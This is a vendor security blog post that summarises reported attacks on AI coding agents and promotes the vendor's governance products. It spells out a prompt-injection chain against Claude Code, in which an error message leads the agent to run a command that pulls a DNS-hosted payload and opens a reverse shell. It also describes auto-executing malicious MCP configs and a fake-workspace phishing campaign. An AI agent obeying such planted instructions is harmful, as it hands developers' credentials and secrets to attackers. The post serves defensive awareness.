Home > Security and Compliance Blog > Cybersecurity Risk Management > AI Agents Are the New Attack Surface

AI Agents Are the New Attack Surface

by Patrick Spencer updated June 30, 2026 Cybersecurity Risk Management

Reading Time: 14 minutes

Security researchers just demonstrated that your AI coding assistant can be turned into an exfiltration tool – and your existing detection controls won’t catch it. Not as a theoretical concern. As a documented, reproducible technique, published by Mozilla’s 0Din team in a detailed proof of concept on June 29, 2026.

That disclosure landed in the same week as a high-severity CVE in Amazon Q Developer, a formal analysis of the new enterprise MCP specification, a documented social engineering campaign targeting cybersecurity teams through fake AI workspaces, and an analysis arguing that traditional identity governance is structurally incapable of containing AI agents. Five separate research threads, published within four days of each other, all pointing at the same structural failure: AI agents operating without a governed content layer become exfiltration pathways.

Table of Contents

The problem isn’t incremental. Enterprises have spent two decades building security controls around a relatively stable model of what an identity is and how it behaves. An agent doesn’t fit that model. It authenticates once, inherits permissions from the human identity it operates on behalf of, and then traverses multiple enterprise systems in a single session – touching resources no human ever explicitly authorized it to access, leaving fragmented logs that no existing security tool assembles into a coherent picture. This week’s research makes that structural problem concrete, and in one case, time-bound: the July 28 publication date for MCP 2026-07-28 creates a defined window for organizations to address a governance gap before the new protocol’s attack surface comes into full effect.

Kiteworks secure data exchange is designed for exactly this problem. When AI agents access enterprise content through Kiteworks’ governed API layer, every interaction is policy-enforced, every data access is logged, and no agent – legitimate or compromised – can reach content outside its explicitly authorized scope. What the research this week collectively describes is an environment where that governance layer is absent. Across every attack vector documented, the outcome is the same: sensitive enterprise data flows to unauthorized parties through an AI system that had no enforced access boundary.

Key Takeaways

1. AI coding agents can be turned into exfiltration tools through indirect prompt injection.

Mozilla’s 0Din team demonstrated that Claude Code can be hijacked via a poisoned DNS TXT record tied to a normal-looking GitHub repository, spawning a reverse shell that silently exfiltrates API keys, tokens, and environment secrets without triggering any of the agent’s built-in security layers.

2. Amazon Q Developer carried a high-severity flaw that handed attackers cloud credentials.

CVE-2026-12957 (CVSS 8.5), disclosed by Wiz, let malicious MCP configuration files embedded in a code repository execute automatically when a developer opened it, giving attacker-controlled servers access to cloud credentials, local files, and shell execution without any user prompt or visible warning.

3. The new MCP 2026-07-28 specification shifts all security responsibility to developers.

The protocol’s move to a stateless design delegates cross-tenant access controls, secrets management, and privilege escalation checks entirely to individual implementers – with no enforcement at the protocol layer. The specification publishes July 28, beginning a 12-month deprecation window.

4. Attackers are building convincing fake AI workspaces to harvest enterprise data.

Push Security documented the “Poisoned Tenant” campaign, in which threat actors create fraudulent OpenAI organizations targeting cybersecurity employees by name, sending invitations from OpenAI’s legitimate notification address that pass all email authentication checks.

5. Traditional identity governance was not built for agents operating at machine speed.

Analysis of the emerging “guardian agent” model shows that IAM infrastructure built around human authentication events cannot contain autonomous agents that inherit overprivileged credentials, traverse multiple enterprise systems in a single session, and leave no coherent audit trail.

You Trust Your Organization is Secure. But Can You Verify It?

Read Now

The Claude Code Attack: Three Indirection Steps, One Reverse Shell

The Mozilla 0Din attack works because it distributes its components across three systems that are never examined together. The repository contains no malicious instructions or code. When a developer clones it, Claude Code follows legitimate installation steps. The attack triggers during first-time setup, when Claude Code is instructed to use a Python package that throws an error if called before initialization.

The error message says: “Run: python3 -m axiom init.” Claude Code reads the error and runs the recovery command. Running init calls a shell script that pulls a configuration value from a DNS TXT record and executes it as a command. That value is base64-encoded, so no reverse shell signature ever appears in plaintext on disk or in transit. The interactive shell spawns on the developer’s machine. The attacker gains access to every credential, API key, token, and environment secret loaded there, and can deploy a backdoor for persistent access after the shell closes.

As the Mozilla researchers put it: “The reverse shell is three indirection steps away from anything Claude Code actually evaluated: an error message it trusted, a script that fetched a value, and a DNS record it never saw.” Static analysis sees a DNS lookup. Network monitoring sees name resolution. The agent sees a pre-authorized setup step. None of the three looks malicious in isolation. The attacker can update the payload at any time by changing the DNS TXT record – no repository changes required – and every developer who opens the repository with Claude Code is exposed.

This bypasses all three of Claude Code’s built-in security layers. That’s not a criticism of Claude Code specifically; it’s a structural characteristic of any AI coding agent that treats error messages as legitimate instructions. The payload delivery mechanism – DNS TXT records – sits outside the agent’s threat model entirely. Any developer using an AI coding agent to set up an unfamiliar repository is operating with a significantly expanded attack surface, one that no existing endpoint or network control reliably covers. Sound AI data protection requires modeling how agents interact with environmental data – not just the content they are explicitly asked to process.

Amazon Q and the Auto-Execution Problem

The Amazon Q Developer vulnerability disclosed by Wiz on June 26, 2026 (CVE-2026-12957, CVSS 8.5) describes the same structural failure from a different angle. The root cause: the extension automatically acted on MCP configuration files embedded in a workspace without asking the user for permission. A developer opened a repository. The repository contained a malicious MCP configuration file. The extension executed it silently, granting an attacker-controlled MCP server access to local files, cloud credentials, and shell execution – no user prompt, no warning, no visible indication that anything unusual had occurred.

AWS was notified April 20, issued a patch on May 12, and published an advisory this week. Fixes are available across VS Code, JetBrains, Eclipse, Visual Studio, and the Amazon Q language server. Wiz notes that the underlying auto-execution pattern is not unique to Amazon Q – similar behaviors have been identified in other AI coding tools including Claude and Cursor. The specific attack vectors Wiz identifies: fake coding tests (a technique associated with North Korean threat actors who target developers), typosquatted open source packages, and malicious pull requests to popular open source projects.

The developer doesn’t have to make a mistake. They have to do exactly what they would normally do with any repository. When a configuration file executes automatically because an agent opened it, there is no policy evaluation happening at the content layer – only execution. The data policy engine concept – evaluating content against policy before an agent acts on it – is what this attack exploits the absence of. “The combination of auto-execution, shell spawning, and environment inheritance created a high-severity vulnerability in a widely-used developer tool,” Wiz wrote. “A single malicious repository could compromise not just the developer’s local machine, but their cloud infrastructure as well.”

The MCP 2026-07-28 Specification Gap

On July 28, 2026, MCP 2026-07-28 will be officially published, beginning a 12-month deprecation window for the current version. The headline change is that MCP is now stateless at the protocol layer. That shift enables enterprise-scale, cloud-native deployments. It also means something specific for security teams: the session-layer security guarantees the current protocol provides are gone in the new version.

Akamai’s analysis of the release candidate identifies several new attack surface areas introduced by the stateless design. Workflow hijacking and cross-tenant access become viable if tracking identifiers are predictable. New MCP-specific HTTP headers (MCP-Method and MCP-Name) create data leakage vectors – if developers inadvertently map sensitive inputs such as API keys, tokens, or PII to those headers, those secrets become visible to every load balancer, proxy, and logging system along the request path. MCP Apps as a first-class protocol extension introduces stored XSS risks. Long-running asynchronous tasks create a denial-of-service vector where task creation is cheap for an attacker but resource-intensive for the server.

Akamai’s conclusion is direct: “The changes are not simply incremental improvements. They fundamentally reshape where security responsibilities reside.” Decisions the current protocol enforces at the session layer are, in the new version, delegated entirely to individual developers and platform operators. Maxim Zavodchik, Akamai’s senior director of threat research, told SecurityWeek: “Since the protocol is transitioning to a stateless model and introducing rich UI apps and asynchronous tasks, critical security boundaries are now entirely dependent on how developers implement them.”

For organizations running AI agents over enterprise content, this is the governance gap that matters most right now. The new protocol won’t enforce data governance, data classification, or access controls. It won’t log what content an agent retrieved. Every one of those security properties has to be implemented at the application layer, by the developer or the platform operator. The July 28 deadline is an inflection point with a defined timeline: organizations have a bounded window to get a governed content layer in place before the new protocol’s attack surface goes live. Kiteworks’ Secure MCP Server provides that governance layer at the AI integration point – the policy enforcement that MCP 2026-07-28 deliberately does not include in the protocol itself.

The Poisoned Tenant: Social Engineering for the AI Era

The “Poisoned Tenant” campaign documented by Push Security takes a different approach to the same objective. Rather than compromising an AI agent through a technical exploit, it creates a fake AI workspace – a fraudulent OpenAI organization impersonating a legitimate company – and invites target employees to join it. The invitation emails come from noreply@tm.openai.com, OpenAI’s actual notification address. They pass all email authentication checks. From a technical standpoint, they are genuine invitations from OpenAI. The only fraudulent element is the organization the user is invited to join.

Push Security discovered the campaign after multiple employees received invitations to join an OpenAI organization named “Push Security Inc.” – created by an attacker using Gmail accounts, not by Push Security. After accepting one invitation to study the attack, Luke Jennings, VP of Research and Development at Push Security, found himself added to the fraudulent organization, which contained a single attacker-controlled account presenting as the company’s CEO. Invited employees had been assigned Owner privileges. A Visa credit card was attached to the billing account to add legitimacy. The project contained no existing chats – only infrastructure to collect whatever sensitive content employees would submit.

Push Security’s read on the campaign’s objective is sharp: “An attacker who just wants to spray scam content through a trusted email channel doesn’t name the organization after their target, research individual employees, or attach a credit card. That investment only pays off if employees actually join the organization and start using it. And on an AI platform, the data people put into prompts can be extraordinarily sensitive – source code, internal documents, customer data, security research, strategic plans.” Phishing has expanded to include AI platforms as the collection infrastructure. Attackers aren’t just after credentials. They’re constructing environments where targets willingly submit the most sensitive content they work with. The intellectual property exposure here is severe: source code and strategic plans submitted to a fraudulent workspace represent a direct loss of intellectual property with no clear path to remediation once the data has left the organization’s control.

Security awareness training is necessary but not sufficient here. The governance question is whether enterprise AI access is channeled through a controlled environment where what goes in and what comes out is visible to the security team – and where the platform itself is under organizational control, not borrowed from a third-party provider without oversight.

Guardian Agents and the Identity Governance Gap

A Hacker News analysis published June 26 describes the “guardian agent” model – AI systems deployed to audit, govern, and terminate other AI agents. The argument is structural: traditional IAM was built around authentication events. A human presents credentials, access is granted or denied, and the session is recorded. Agents don’t follow that sequence.

An agent authenticates once, typically via a long-lived token or API credential, and then operates continuously across sessions, systems, and contexts without an intervening governance checkpoint. When an agent executes on behalf of a sales director, it carries that person’s OAuth tokens, their delegated permissions, and any overprivileged access accumulated over years of role changes. The agent doesn’t distinguish between what the human would have done and what it’s been instructed to do. It executes with full inherited authority across every application that identity can reach – CRM systems, code repositories, document stores, internal APIs – all in a single session, all through credentials originally scoped for a human user working in a completely different context.

What this creates, in environments without dedicated agent governance, is what the analysis calls “identity dark matter”: identity activity that exists and exerts real risk inside an environment while remaining invisible to the tools responsible for governing it. Agents don’t go through access request workflows. They don’t get onboarded into identity governance systems. They inherit credentials from existing identities and start executing. The result is a growing population of autonomous identities operating with no formal governance record, no ownership mapping, and no behavioral baseline. Zero trust architecture requires continuous verification of every entity – but verification requires visibility, and most organizations have no visibility into what their AI agents are doing after they authenticate. Attribute-based access control (ABAC) is the technical mechanism that makes continuous verification operational: access decisions evaluate agent identity, content sensitivity, and execution context at every request, rather than relying on a single authentication event to authorize an entire session.

Guardian agents address this by operating at the execution layer rather than the authentication boundary. They maintain continuous identity inventory, behavioral baselines, and runtime least-privilege enforcement – the governance layer that conventional IAM tools weren’t built to deliver. The analogy to governed content exchange is direct: moving the security enforcement point to where permissions are actually exercised, so that access controls apply based on what the agent is doing right now, not what it was originally provisioned to do months ago.

The Common Thread: No Enforced Content Boundary

Five disclosures, four days, one structural failure. The Claude Code attack, the Amazon Q vulnerability, the MCP specification gap, the Poisoned Tenant campaign, and the guardian agent analysis all point to enterprises that have deployed AI agents with meaningful capabilities and no enforced content governance layer.

The Kiteworks 2026 Data Security and Compliance Risk: Annual Forecast Report documented how AI-related risks were becoming the primary concern across enterprise security programs – with a persistent gap between how fast organizations were deploying AI and how much governance infrastructure they were building around it. The research this week shows what that gap looks like from an attacker’s perspective. Whether the vector is a poisoned DNS record, a malicious MCP configuration file, a fraudulent AI workspace invitation, or an ungoverned agent operating with inherited overprivileged credentials – the outcome is the same: sensitive enterprise data flows to unauthorized parties through an AI system that had no enforced access boundary. Every one of these incidents, if it had involved regulated data, would constitute a reportable data breach under HIPAA, GDPR, or comparable frameworks – the compliance exposure compounds the security exposure.

Kiteworks Compliant AI addresses that gap at the data layer. When enterprise AI operates through Kiteworks’ governed environment, every agent interaction is subject to policy enforcement, every data access is logged with a full audit trail, and no agent – regardless of what credentials it carries or what instructions it has received – can reach content outside its explicitly authorized scope. DLP and data classification capabilities apply at the API layer, not after the fact. The July 28 MCP specification deadline makes this more urgent than a general best practice: the new protocol explicitly delegates content governance to the application layer, and organizations that don’t have that layer in place before July 28 are running agents into an environment the protocol won’t protect.

The CISO Dashboard gives security leaders the visibility to understand what enterprise AI is accessing, when, and by whom. In the environment this week’s research describes, that visibility isn’t optional. It’s the prerequisite for any meaningful governance of AI agent behavior. Organizations conducting a formal risk assessment of their AI agent deployments should treat the absence of a governed content layer as the single highest-priority finding – every other control assumes that layer exists.

To learn more about governing AI agent data access in regulated environments, schedule a custom demo today.

Frequently Asked Questions

The Mozilla 0Din attack demonstrates that built-in security controls can be bypassed when an attack is carefully split across systems the agent never examines together. In the documented technique, the malicious payload lives in a DNS TXT record – not in the repository, not in any file the agent reads directly. The agent follows a legitimate error message pointing to a legitimate recovery command. That command calls a script that performs a DNS lookup. The agent never sees the payload; it sees a sequence of steps that each look authorized. Because the attack exploits the agent’s trust in error messages as instructions rather than any content vulnerability, standard controls that scan repository content miss it entirely. Organizations working to understand this threat should examine how AI data protection policies apply to the AI coding tools developers use – not just the content those tools are asked to process. The zero trust generative AI principle of never trusting environmental inputs without verification applies directly here. A documented incident response plan that explicitly covers AI coding agent compromise scenarios gives security teams a defined escalation path when this class of attack is detected.

The patch addresses CVE-2026-12957 specifically, but Wiz notes that the underlying auto-execution pattern – MCP configuration files executing without user permission when a workspace is opened – is not unique to Amazon Q. Similar behaviors have been identified in other AI coding tools. Any organization running AI coding assistants should audit whether those tools exhibit comparable auto-execution behaviors. More broadly, the incident illustrates that third-party risk management now extends to the AI tools developers use, not just the software they build. A repository shared across teams or sourced externally carries a new class of risk when AI coding agents are active in the development environment. Vendor risk management programs should include the AI tooling layer as a distinct risk category – not just the third-party code those tools help produce. Extending supply chain risk management practices to cover AI development tooling closes a gap that traditional software supply chain reviews — focused on dependencies and packages — typically miss.

Start with an inventory: every AI agent deployment using MCP connections, what content those agents can access, and on whose authority. The new specification’s stateless design means cross-tenant access controls, secrets management, and privilege escalation protections are not enforced at the protocol layer. They have to be implemented by whoever builds and operates the MCP server. Data governance policies specifying what content an agent can access, under what conditions, and with what logging need to be in place before July 28 – not after. For organizations that have deployed AI agents over regulated data – PHI, financial records, defense-related information – the specification change is a compliance event, not just a security one. Kiteworks’ Secure MCP Server enforces governance boundaries at the AI integration layer regardless of what the protocol provides, making it a practical solution for organizations that cannot wait for the broader developer ecosystem to catch up. Feeding agent access logs into a SIEM platform from day one gives security teams the real-time anomaly detection capability that the new stateless protocol does not provide natively.

Conventional phishing tricks users into clicking a malicious link or submitting credentials to a fake site. The Poisoned Tenant campaign uses legitimate platform infrastructure: the invitation is real, the email is from OpenAI’s actual notification address, it passes all email authentication checks, and the platform is a genuine OpenAI service. What’s fraudulent is only the organization the user is invited to join. Email security controls that scan for malicious links or spoofed senders won’t catch this because there’s nothing technically malicious to flag. Push Security recommends training employees to verify unexpected organization invitations and monitoring SaaS organization memberships – but this also points to a broader architectural need. Enterprise AI access should flow through controlled environments where the security team can see what employees are submitting. Secure collaboration platforms with policy enforcement and audit logs provide visibility that a standard ChatGPT workspace doesn’t – and that visibility is the difference between knowing an exfiltration event happened and learning about it from an attacker. Enforcing MFA on every SaaS organization membership action, not just primary account logins, would have flagged the Owner-privilege grant in this campaign before sensitive content was ever submitted.

A guardian agent is a control layer that governs the identity and behavior of AI agents operating in an enterprise environment. Where conventional IAM tools govern access at the authentication boundary, a guardian agent operates at the execution layer – maintaining continuous inventory of every autonomous identity, building behavioral baselines, and enforcing runtime least-privilege policies against what agents actually do across tool calls, data accesses, and cross-system movements. The concept is gaining production adoption. Its practical prerequisite is zero trust data exchange thinking applied to agent identities: every agent interaction must be verified, not just authenticated. The June 26 analysis notes that this requires a control plane built for the execution layer – existing IAM, PAM, and CIEM tools weren’t designed to follow an agent through a multi-system session and enforce policy at each step. AI data governance programs that treat AI agents as governed identities with defined content access boundaries are the organizational prerequisite for making guardian agent controls effective in practice. Data minimization applied to agent credential scope — ensuring an agent inherits only the access its specific task requires, rather than the full permission set of the human identity it operates on behalf of — is the most direct way to limit the blast radius before guardian agent tooling matures further.

Additional Resources